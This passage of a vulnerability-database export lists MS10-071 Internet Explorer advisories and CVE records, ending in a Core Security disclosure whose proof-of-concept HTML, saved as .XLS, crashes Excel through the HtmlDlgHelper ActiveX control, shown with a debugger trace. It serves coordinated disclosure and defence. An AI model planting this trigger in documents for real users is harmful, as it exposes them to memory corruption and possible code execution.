"2021-12-17T11:57:29", "description": "Multiple memory corruption vulnerabilities have been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted. To trigger this issue, an attacker may create a malicious web page that will cause Internet Explorer to exit unexpectedly. Successful exploitation of this vulnerability will crash the browser, and may allow execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2014-12-28T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Event Handling Memory Corruption (MS10-071) - Ver2 (CVE-2010-3326)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3326"], "modified": "2014-12-28T00:00:00", "id": "CPAI-2014-2344", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:36:52", "description": "Multiple memory corruption vulnerabilities have been reported in Microsoft Internet Explorer. An information disclosure vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in Internet Explorer that incorrectly allows scripts to access and read content from different domains. An attacker can trigger this flaw by convincing a user to view a specially crafted HTML document. Successful exploitation of this issue may allow the attacker to read cookies or other data from another domain or Internet Explorer security zone.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Cross-Domain Information Disclosure (MS10-071; CVE-2010-3330)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3330"], "modified": "2010-10-12T00:00:00", "id": "CPAI-2010-288", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2023-09-21T13:33:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the function CAttrArray::PrivateFind as defined in mshtml.dll. If a specific property of a stylesheet object is set, the code within mshtml can be forced to free an object which is subsequently accessed later. This can be leveraged by an attacker to execute remote code under the context of the user running the browser.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "zdi", "title": "Microsoft Internet Explorer Stylesheet PrivateFind Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3328"], "modified": "2010-10-12T00:00:00", "id": "ZDI-10-197", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-197/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-09-21T11:04:05", "description": "Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka \"HTML Sanitization Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3243", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3243"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:sharepoint_services:3.0", "cpe:/a:microsoft:sharepoint_server:2007", "cpe:/a:microsoft:internet_explorer:8"], "id": "CVE-2010-3243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2007:sp2:x64:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_services:3.0:sp2:x64:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2007:sp2:x32:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_services:3.0:sp2:x32:*:*:*:*:*"]}, {"lastseen": "2023-09-23T20:12:11", "description": "Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka \"AutoComplete Information Disclosure Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-0808", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0808"], "modified": "2021-07-23T15:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-0808", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0808", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:46:29", "description": "Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka \"Uninitialized Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3328", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3328"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-3328", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:42:33", "description": "Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka \"CSS Special Character Information Disclosure Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3325", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3325"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-3325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3325", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:43:21", "description": "Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory in certain circumstances involving use of Microsoft Word to read Word documents, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka \"Uninitialized Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3331", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3331"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-3331", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:42:56", "description": "The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka \"Anchor Element Information Disclosure Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3327", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3327"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-3327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3327", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:48:58", "description": "mshtmled.dll in Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code via a crafted Microsoft Office document that causes the HtmlDlgHelper class destructor to access uninitialized memory, aka \"Uninitialized Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3329", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3329"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2010-3329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3329", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:46:07", "description": "Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka \"Cross-Domain Information Disclosure Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3330", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3330"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-3330", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3330", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:45:40", "description": "Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka \"Uninitialized Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2010-10-13T19:00:00", "type": "cve", "title": "CVE-2010-3326", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3326"], "modified": "2021-07-23T12:16:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2010-3326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T11:41:37", "description": "The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka \"HTML Sanitization Vulnerability,\" a different vulnerability than CVE-2010-1257.", "cvss3": {}, "published": "2010-09-17T18:00:00", "type": "cve", "title": "CVE-2010-3324", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1257", "CVE-2010-3324"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:web_apps:*", "cpe:/a:microsoft:sharepoint_server:2007", "cpe:/a:microsoft:groove_server:2010", "cpe:/a:microsoft:sharepoint_foundation:2010", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:sharepoint_services:3.0"], "id": "CVE-2010-3324", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3324", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2010:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_services:3.0:sp2:x32:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2007:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:groove_server:2010:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:web_apps:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:12:01", "description": "", "cvss3": {}, "published": "2010-10-15T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2010.0517", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3329"], "modified": "2010-10-15T00:00:00", "id": "PACKETSTORM:94815", "href": "https://packetstormsecurity.com/files/94815/Core-Security-Technologies-Advisory-2010.0517.html", "sourceData": "` Core Security Technologies - CoreLabs Advisory \nhttp://corelabs.coresecurity.com \n \nMicrosoft Office HtmlDlgHelper class memory corruption \n \n \n1. *Advisory Information* \n \nTitle: Microsoft Office HtmlDlgHelper class memory corruption \nAdvisory Id: CORE-2010-0517 \nAdvisory URL: \n[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption] \nDate published: 2010-10-12 \nDate of last update: 2010-10-14 \nVendors contacted: Microsoft \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Missing Initialization [CWE-456] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2010-3329 \nBugtraq ID: N/A \n \n \n3. *Vulnerability Description* \n \nMicrosoft Windows is prone to a memory corruption vulnerability when \ninstantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office \nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of \nInternet Explorer ('mshtmled.dll'). This vulnerability could be used by \na remote attacker to execute arbitrary code with the privileges of the \nuser that opened the malicious file. \n \n \n4. *Vulnerable packages* \n \n. IE 6 \n. IE 7 \n. IE 8 \n. MS Office XP \n. MS Office 2003 \n. MS Office 2007 and MS Office 2010 (the control is disabled by default) \n \n \n5. *Non-vulnerable packages* \n \n. For further information and patches about this issue look at the \nMicrosoft Security Bulletin Summary for October 2010 [1], patch ms10-071. \n \n \n6. *Credits* \n \nThis vulnerability was discovered by Damian Frizza from Core Security \nTechnologies. \n \n \n7. *Technical Description / Proof of Concept Code* \n \nMicrosoft Windows is prone to a memory corruption vulnerability when \ninstantiating the 'HtmlDlgHelper Class Object' \n('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office \nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of \nInternet Explorer ('mshtmled.dll'). The vulnerability occurs in \n'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is \ncalled and then makes access to uninitialized memory. \n \nThe ActiveX control is marked as \"Not Safe for Initialization\", and \nprompts the user with: \"ActiveX controls might contain viruses or other \nsecurity hazards. Do not enable this content unless you trust the source \nof this file\". However, in Office 2003 the bug is triggered even if the \nuser answers \"No\" to the prompt. \n \nThe following code is where the vulnerability occurs, when opening a \n.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll' \nv8.0.6001.18702): \n \n/----- \nmshtmled!ReleaseInterface: \n42b919c0 8bff mov edi,edi \n42b919c2 55 push ebp \n42b919c3 8bec mov ebp,esp \n42b919c5 8b4508 mov eax,dword ptr [ebp+8] \nss:0023:0013d104=00310065 \n42b919c8 85c0 test eax,eax \n42b919ca 7406 je mshtmled!ReleaseInterface+0x12 \n(42b919d2) [br=0] \n42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065 \n42b919ce 50 push eax \n42b919cf ff5108 call dword ptr [ecx+8] \nds:0023:7d02029c=2a2c277a \n \neax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc \nedi=00000000 \neip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na \npe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00000206 \n \nStack Trace: \n<Unloaded_ion.dll>+0x2a2c2779 \nmshtmled!ReleaseInterface+0x12 \nmshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10 \nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting \ndestructor'+0xd \nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27 \nVBE6!rtcStrConvVar+0xbd65 \nVBE6!rtcSetDatabaseLcid+0xa823 \nEXCEL!Ordinal41+0xd2ad0 \nEXCEL!Ordinal41+0x14082a \nUSER32!CallWindowProcW+0x1b \nInstruction Address: 0x000000002a2c277a \n-----/ \n \n \nThe following html code demonstrates the bug on Excel 2002/2003. Save \nthe file as .XLS and open it on Excel. \n \n/----- \n<html xmlns:v=\"urn:schemas-microsoft-com:vml\" \nxmlns:o=\"urn:schemas-microsoft-com:office:office\" \nxmlns:x=\"urn:schemas-microsoft-com:office:excel\"> \n \n<head> \n<meta http-equiv=Content-Type content=\"text/html; charset=windows-1252\"> \n<meta name=ProgId content=Excel.Sheet> \n<meta name=Generator content=\"Microsoft Excel 10\"> \n<!--[if !mso]> \n<style> \nv\\:* {behavior:url(#default#VML);} \no\\:* {behavior:url(#default#VML);} \nx\\:* {behavior:url(#default#VML);} \n.shape {behavior:url(#default#VML);} \n</style> \n<![endif]--><!--[if gte mso 9]><xml> \n<o:DocumentProperties> \n<o:LastAuthor>TEST</o:LastAuthor> \n<o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved> \n<o:Version>10.6858</o:Version> \n</o:DocumentProperties> \n<o:OfficeDocumentSettings> \n<o:DownloadComponents/> \n</o:OfficeDocumentSettings> \n</xml><![endif]--> \n \n<!--[if gte mso 9]><xml> \n<x:ExcelWorkbook> \n<x:ExcelWorksheets> \n<x:ExcelWorksheet> \n<x:Name>test</x:Name> \n<x:WorksheetOptions> \n<x:CodeName>Sheet1</x:CodeName> \n<x:Selected/> \n<x:DoNotDisplayGridlines/> \n<x:ProtectContents>False</x:ProtectContents> \n<x:ProtectObjects>False</x:ProtectObjects> \n<x:ProtectScenarios>False</x:ProtectScenarios> \n</x:WorksheetOptions> \n</x:ExcelWorksheet> \n</x:ExcelWorksheets> \n<x:WindowHeight>9345</x:WindowHeight> \n<x:WindowWidth>13260</x:WindowWidth> \n<x:WindowTopX>240</x:WindowTopX> \n<x:WindowTopY>60</x:WindowTopY> \n<x:ProtectStructure>False</x:ProtectStructure> \n<x:ProtectWindows>False</x:ProtectWindows> \n</x:ExcelWorkbook> \n</xml><![endif]--><!--[if gte mso 9]><xml> \n<o:shapedefaults v:ext=\"edit\" spidmax=\"1026\"/> \n</xml><![endif]--><!--[if gte mso 9]><xml> \n<o:shapelayout v:ext=\"edit\"> \n<o:idmap v:ext=\"edit\" data=\"1\"/> \n</o:shapelayout></xml><![endif]--> \n</head> \n \n<body link=blue vlink=purple> \n \n<table x:str border=0 cellpadding=0 cellspacing=0 width=64 \nstyle='border-collapse: \ncollapse;table-layout:fixed;width:48pt'> \n<col width=64 style='width:48pt'> \n<tr height=17 style='height:12.75pt'> \n<td height=17 width=64 style='height:12.75pt;width:48pt' align=left \nvalign=top><!--[if gte vml 1]><v:shapetype id=\"_x0000_t201\" \ncoordsize=\"21600,21600\" \no:spt=\"201\" path=\"m,l,21600r21600,l21600,xe\"> \n<v:stroke joinstyle=\"miter\"/> \n<v:path shadowok=\"f\" o:extrusionok=\"f\" strokeok=\"f\" fillok=\"f\" \no:connecttype=\"rect\"/> \n<o:lock v:ext=\"edit\" shapetype=\"t\"/> \n</v:shapetype><v:shape id=\"_x0000_s1025\" type=\"#_x0000_t201\" \nstyle='position:absolute; \nmargin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1' \nstrokecolor=\"windowText [64]\" o:insetmode=\"auto\"> \n<![if gte mso 9]><o:title=\"\"/> \n<![endif]><x:ClientData ObjectType=\"Pict\"> \n<x:SizeWithCells/> \n<x:CF>Pict</x:CF> \n<x:AutoPict/> \n</x:ClientData> \n</v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout; \nposition:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px; \nheight:17px'><![endif]> \n \n<object classid=\"CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B\" \nid=obj></object> \n \n<![if !vml]></span><![endif]><span \nstyle='mso-ignore:vglayout2'> \n<table cellpadding=0 cellspacing=0> \n<tr> \n<td height=17 width=64 style='height:12.75pt;width:48pt'></td> \n</tr> \n</table> \n</span></td> \n</tr> \n<![if supportMisalignedColumns]> \n<tr height=0 style='display:none'> \n<td width=64 style='width:48pt'></td> \n</tr> \n<![endif]> \n</table> \n</body> \n</html> \n \n-----/ \n \n \nThis exploitable condition was reproduced in the following versions of \n'mshtmled.dll': \n \n. 'mshtmled.dll' v8.0.6001.18702 \n. 'mshtmled.dll' v8.0.6001.18000 \n. 'mshtmled.dll' v7.0.6000.17023 \n. 'mshtmled.dll' v7.0.6000.17080 \n \n \n8. *Report Timeline* \n \n. 2010-05-28: \nInitial notification to the vendor. Draft advisory and proof-of-concept \nfiles sent to MSRC. Publication date set for July 13, 2010. \n \n. 2010-06-11: \nCore requests from the vendor an update on the status of this case. \n \n. 2010-06-14: \nThe vendor responds that its engineers are still investigating this \nissue; and that they expect to have more information from the \ninvestigation and triage process within the next few days. \n \n. 2010-06-15: \nThe vendors informs that they have been determined that the ActiveX \ncontrol is marked as \"Not Safe for Initialization\"; and prompts the user \nwith a dialog that warns the user that they are going to be executing a \npotentially malicious code. In consequence, the vendor treats this case \nas the same scenario as a user that tries to enable and open an Office \ndocument with a Macro or VBA code contained within. \n \n. 2010-06-15: \nCore asks the vendor if the previous mail means that it does not intent \nto fix the bug or that it does not recognize it as a security issue. The \nreporter's viewpoint is that a dialog prompt is not a fix \"per se\" and \njust a defense in depth mechanism; and 